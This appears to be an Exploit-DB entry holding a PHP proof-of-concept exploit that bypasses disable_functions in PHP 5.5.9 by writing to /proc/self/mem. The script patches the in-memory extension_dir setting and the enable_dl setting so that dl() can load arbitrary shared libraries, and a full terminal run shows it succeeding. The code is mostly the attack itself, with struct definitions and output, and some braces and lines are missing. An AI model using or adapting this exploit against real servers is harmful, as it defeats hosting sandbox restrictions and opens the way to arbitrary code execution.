PHP 5.5.9 – ‘zend_executor_globals’ ‘CGIMode FPM WriteProcMemFile’ disable_functions Bypass / Load Dynamic Library

  • 作者: ylbhz
    日期: 2015-09-10
  • 类别:
  • 来源:
  • <?php
    // EDB Note: Paper
    define('ZEND_INI_USER', (1<<0));
    define('ZEND_INI_PERDIR', (1<<1));
    define('ZEND_INI_SYSTEM', (1<<2));
    00df9000-00e16000 rw-p 00000000 00:00 0 
    017ff000-01a51000 rw-p 00000000 00:00 0[heap]
    typedef struct bucket {
    	ulong h;						/\* Used for numeric indexing *\/
    	uint nKeyLength;
    	void *pData;
    	void *pDataPtr;
    	struct bucket *pListNext;
    	struct bucket *pListLast;
    	struct bucket *pNext;
    	struct bucket *pLast;
    	const char *arKey;
    } Bucket;
    typedef struct _hashtable {
    	uint nTableSize;
    	uint nTableMask;
    	uint nNumOfElements;
    	ulong nNextFreeElement;
    	Bucket *pInternalPointer;	/\* Used for element traversal *\/
    	Bucket *pListHead;
    	Bucket *pListTail;
    	Bucket **arBuckets;
    	dtor_func_t pDestructor; //pointer
    	zend_bool persistent;
    	unsigned char nApplyCount;
    	zend_bool bApplyProtection;
    #if ZEND_DEBUG
    	int inconsistent;
    } HashTable;
    struct _zend_executor_globals {
    	zval **return_value_ptr_ptr;
    	zval uninitialized_zval;
    	zval *uninitialized_zval_ptr;
    	zval error_zval;
    	zval *error_zval_ptr;
    	zend_ptr_stack arg_types_stack;
    	/\* symbol table cache *\/
    	HashTable *symtable_cache[SYMTABLE_CACHE_SIZE];
    	HashTable **symtable_cache_limit;
    	HashTable **symtable_cache_ptr;
    	zend_op **opline_ptr;
    	HashTable *active_symbol_table;
    	HashTable symbol_table;		/\* main symbol table *\/
    	HashTable included_files;	/\* files already included *\/
    	JMP_BUF *bailout;
    	int error_reporting;
    	int orig_error_reporting;
    	int exit_status;
    	zend_op_array *active_op_array;
    	HashTable *function_table;	/\* function symbol table *\/
    	HashTable *class_table;		/\* class table *\/
    	HashTable *zend_constants;	/\* constants table *\/
    	zend_class_entry *scope;
    	zend_class_entry *called_scope; /\* Scope of the calling class *\/
    	zval *This;
    	long precision;
    	int ticks_count; //10*8
    	zend_bool in_execution;//typedef unsigned char zend_bool;
    	HashTable *in_autoload;
    	zend_function *autoload_func;
    	zend_bool full_tables_cleanup;
    	/\* for extended information support *\/
    	zend_bool no_extensions;
    #ifdef ZEND_WIN32
    	zend_bool timed_out;
    	OSVERSIONINFOEX windows_version_info;
    	HashTable regular_list;
    	HashTable persistent_list;
    	zend_vm_stack argument_stack;
    	int user_error_handler_error_reporting;
    	zval *user_error_handler;
    	zval *user_exception_handler;
    	zend_stack user_error_handlers_error_reporting;
    	zend_ptr_stack user_error_handlers;
    	zend_ptr_stack user_exception_handlers;
    	/\* timeout support *\/
    	int timeout_seconds;
    	int lambda_count;
    	HashTable *ini_directives;
    	HashTable *modified_ini_directives;
    	zend_ini_entry *error_reporting_ini_entry;	
    	zend_objects_store objects_store;
    	zval *exception, *prev_exception;
    	zend_op *opline_before_exception;
    	zend_op exception_op[3];
    	struct _zend_execute_data *current_execute_data;
    	struct _zend_module_entry *current_module;
    	zend_property_info std_property_info;
    	zend_bool active; 
    	zend_op *start_op;
    	void *saved_fpu_cw_ptr;
    	XPFPA_CW_DATATYPE saved_fpu_cw;
    	void *reserved[ZEND_MAX_RESERVED_RESOURCES];
    struct _zend_ini_entry {
    int module_number;
    int modifiable;
    char *name;
    uint name_length;
    void *mh_arg1;
    void *mh_arg2;
    void *mh_arg3;
    char *value;
    //echo file_get_contents("/proc/self/maps");
    $mem = fopen("/proc/self/mem", "rb");
    ylbhz@ylbhz-Aspire-5750G:/tmp$ php -r "echo file_get_contents('/proc/self/maps');"
    00400000-00bf3000 r-xp 00000000 08:01 4997702/usr/bin/php5
    00df3000-00e94000 r--p 007f3000 08:01 4997702/usr/bin/php5
    00e94000-00ea1000 rw-p 00894000 08:01 4997702/usr/bin/php5
    00ea1000-00ebe000 rw-p 00000000 00:00 0 
    0278f000-02a65000 rw-p 00000000 00:00 0[heap]
    //set the extension_dir
    fseek($mem, 0x00ea1000);
    for($i = 0;$i <0x00ebe000 - 0x00ea1000;$i += 4)
    	//echo 'x';
    	$num = unp(fread($mem, 4));
    	if($num == 0x66778899)
    		$offset = 0x00ea1000 + $i;
    		printf("got noe, offset is:0x%x\r\n", $offset);
    		printf("Now set error_reporting to 0x55667788 and reread the value\r\n");
    		fseek($mem, $offset);
    		$num = unp(fread($mem, 4));
    		printf("The value is %x\r\n", $num);
    		if($num == 0x55667788)
    			printf("I found the offset of executor_globals's member error_reporting\r\n");
    			printf("read the structure\r\n");
    			fseek($mem, $offset);
    			fseek($mem, $offset + 392 - 8); //seek to int timeout_seconds member
    			$timeout = dump_value($mem, 4);
    			if($timeout == 0x41424344)
    				error_reporting(E_ALL); //restore the error reporting
    				printf("I found the timeout_seconds I seted:0x%08x\r\n", $timeout);
    				dump_value($mem, 4);
    				$ini_dir = dump_value($mem, 8);
    				printf("ini_directives address maybe in 0x%016x\r\n", $ini_dir);
    				fseek($mem, $ini_dir + 48); //seek to Bucket **arBuckets;
    				$arBucket = dump_value($mem, 8);
    				printf("Bucket **arBuckets address maybe in 0x%016x\r\n", $arBucket);
    				fseek($mem, $arBucket);
    				//try to get the first Bucket address
    				for($i = 0;$i < 1000;$i ++)
    					$bucket = dump_value($mem, 8);
    					//printf("This bucket address maybe in 0x%016x\r\n", $bucket);
    					fseek($mem, $bucket + 16); //seek to const void *pData; in struct Bucket
    					$pdata = dump_value($mem, 8);
    					dump_value($mem, 8);
    					//printf("This pData address maybe in 0x%016x\r\n", $pdata);
    					fseek($mem, $pdata + 8); //seek to char* name;
    					$name = dump_value($mem, 8);
    					$name_t = dump_value($mem, 4);
    					//printf("This char name* address maybe in 0x%016x, length:%d\r\n", $name, $name_t);
    					fseek($mem, $name);
    					$strname = fread($mem, $name_t);
    					if(strlen($strname) == 0) break;
    					//printf("ini key:%s\r\n", $strname);
    					if(strncmp($strname, 'extension_dir', 13) == 0)
    						printf("I found the extension_dir offset!\r\n");
    						printf("try to set extension_dir value /tmp by ini_set\r\n");
    						ini_set('extension_dir', '/tmp');
    						printf("try to get extension_dir value by ini_get\r\n");
    						// write string value
    						fseek($mem, $pdata + 56); //seek to char* value;
    						$value = dump_value($mem, 8);
    						$value_t = dump_value($mem, 4);
    						printf("This char value* address maybe in 0x%016x, length:%d\r\n", $value, $value_t);
    						// write data part
    						$mem_w = fopen("/proc/self/mem", "wb");
    						fseek($mem_w, $value);
    						fwrite($mem_w, "/tmp\0", 5); //write /tmp value
    						printf("retry to get extension_dir value!!!!\r\n");
    					//seek to struct bucket *pListNext; ready to read next bucket's address
    					fseek($mem, $bucket + 32 + 8);//struct bucket *pListLast;it's so strage!
    			printf("now here, restore the value\r\n");
    //set the enable_dl
    fseek($mem, 0x00ea1000);
    for($i = 0;$i <0x00ebe000 - 0x00ea1000;$i += 4)
    	$num = unp(fread($mem, 4));
    	if($num == 0x66778899)
    		$offset = 0x00ea1000 + $i;
    		printf("got noe, offset is:0x%x\r\n", $offset);
    		printf("Now set error_reporting to 0x55667788 and reread the value\r\n");
    		fseek($mem, $offset);
    		$num = unp(fread($mem, 4));
    		printf("The value is %x\r\n", $num);
    		if($num == 0x55667788)
    			printf("I found the offset of executor_globals's member error_reporting\r\n");
    			printf("read the structure\r\n");
    			fseek($mem, $offset);
    			fseek($mem, $offset + 392 - 8); //seek to int timeout_seconds member
    			$timeout = dump_value($mem, 4);
    			if($timeout == 0x41424344)
    				error_reporting(E_ALL); //restore the error reporting
    				printf("I found the timeout_seconds I seted:0x%08x\r\n", $timeout);
    				dump_value($mem, 4);
    				$ini_dir = dump_value($mem, 8);
    				printf("ini_directives address maybe in 0x%016x\r\n", $ini_dir);
    				fseek($mem, $ini_dir + 48); //seek to Bucket **arBuckets;
    				$arBucket = dump_value($mem, 8);
    				printf("Bucket **arBuckets address maybe in 0x%016x\r\n", $arBucket);
    				fseek($mem, $arBucket);
    				//try to get the first Bucket address
    				for($i = 0;$i < 1000;$i ++)
    					$bucket = dump_value($mem, 8);
    					//printf("This bucket address maybe in 0x%016x\r\n", $bucket);
    					fseek($mem, $bucket + 16); //seek to const void *pData; in struct Bucket
    					$pdata = dump_value($mem, 8);
    					dump_value($mem, 8);
    					//printf("This pData address maybe in 0x%016x\r\n", $pdata);
    					fseek($mem, $pdata + 8); //seek to char* name;
    					$name = dump_value($mem, 8);
    					$name_t = dump_value($mem, 4);
    					//printf("This char name* address maybe in 0x%016x, length:%d\r\n", $name, $name_t);
    					fseek($mem, $name);
    					$strname = fread($mem, $name_t);
    					if(strlen($strname) == 0) break;
    					//printf("ini key:%s\r\n", $strname);
    					if(strncmp($strname, 'enable_dl', 9) == 0)
    						printf("I found the enable_dl offset!\r\n");
    						printf("try to set enable_dl value true by ini_set\r\n");
    						ini_set('enable_dl', true);
    						printf("try to get enable_dl value by ini_get\r\n");
    						printf("try to run dl() function\r\n");
    						printf("try to modifiy the modifiable member in memory!\r\n");
    						fseek($mem, $pdata + 4);
    						$modifiable = dump_value($mem, 4);
    						printf("org modifiable value is %x\r\n", $modifiable);
    						$mem_w = fopen("/proc/self/mem", "wb");
    						fseek($mem_w, $pdata + 4); //seek to modifiable
    						fwrite($mem_w, packli(7));
    						fseek($mem, $pdata + 4);
    						$modifiable = dump_value($mem, 4);
    						printf("now modifiable value is %x\r\n", $modifiable);
    						printf("try ini_set enable_dl agen!!!!\r\n");
    						ini_set('enable_dl', true);
    						printf("now enable_dl seting is\r\n");
    						printf("retry the dl() function!!!!\r\n");
    						ini_set('extension_dir', '/tmp');
    					//seek to struct bucket *pListNext; ready to read next bucket's address
    					fseek($mem, $bucket + 32 + 8);//struct bucket *pListLast;it's so strage!
    			printf("now here, restore the value\r\n");
    function unp($value) {
    return hexdec(bin2hex(strrev($value)));
    function dump_value($dh, $flag)
    		case 4: return unp(fread($dh, 4));
    		case 8: return unp(fread($dh, 8));
    function packlli($value) {
    $higher = ($value & 0xffffffff00000000) >> 32;
    $lower = $value & 0x00000000ffffffff;
    return pack('V2', $lower, $higher);
    function packli($value) {
    return pack('V', $value);
    ylbhz@ylbhz-Aspire-5750G:/tmp$ php php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php
    got noe, offset is:0xebd180
    Now set error_reporting to 0x55667788 and reread the value
    The value is 55667788
    I found the offset of executor_globals's member error_reporting
    read the structure
    I found the timeout_seconds I seted:0x41424344
    ini_directives address maybe in 0x00000000024983c0
    Bucket **arBuckets address maybe in 0x00000000026171e0
    I found the extension_dir offset!
    try to set extension_dir value /tmp by ini_set
    try to get extension_dir value by ini_get
    string(22) "/usr/lib/php5/20121212"
    This char value* address maybe in 0x0000000000b5ea53, length:22
    retry to get extension_dir value!!!!
    string(4) "/tmp"
    got noe, offset is:0xebd180
    Now set error_reporting to 0x55667788 and reread the value
    The value is 55667788
    I found the offset of executor_globals's member error_reporting
    read the structure
    I found the timeout_seconds I seted:0x41424344
    ini_directives address maybe in 0x00000000024983c0
    Bucket **arBuckets address maybe in 0x00000000026171e0
    I found the enable_dl offset!
    try to set enable_dl value true by ini_set
    try to get enable_dl value by ini_get
    string(0) ""
    try to run dl() function
    PHP Warning:dl(): Dynamically loaded extensions aren't enabled in /tmp/php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php on line 326
    try to modifiy the modifiable member in memory!
    org modifiable value is 4
    now modifiable value is 7
    try ini_set enable_dl agen!!!!
    now enable_dl seting is
    string(1) "1"
    retry the dl() function!!!!
    PHP Warning:dl(): Unable to load dynamic library '/tmp/not_exists' - /tmp/not_exists: cannot open shared object file: No such file or directory in /tmp/php_cgimode_fpm_writeprocmemfile_bypass_disablefunction_demo.php on line 345
    ylbhz@ylbhz-Aspire-5750G:/tmp$ php -v
    PHP 5.5.9-1ubuntu4.9 (cli) (built: Apr 17 2015 11:44:57) 
    Copyright (c) 1997-2014 The PHP Group
    Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
    with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies
    ylbhz@ylbhz-Aspire-5750G:/tmp$ uname -a
    Linux ylbhz-Aspire-5750G 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux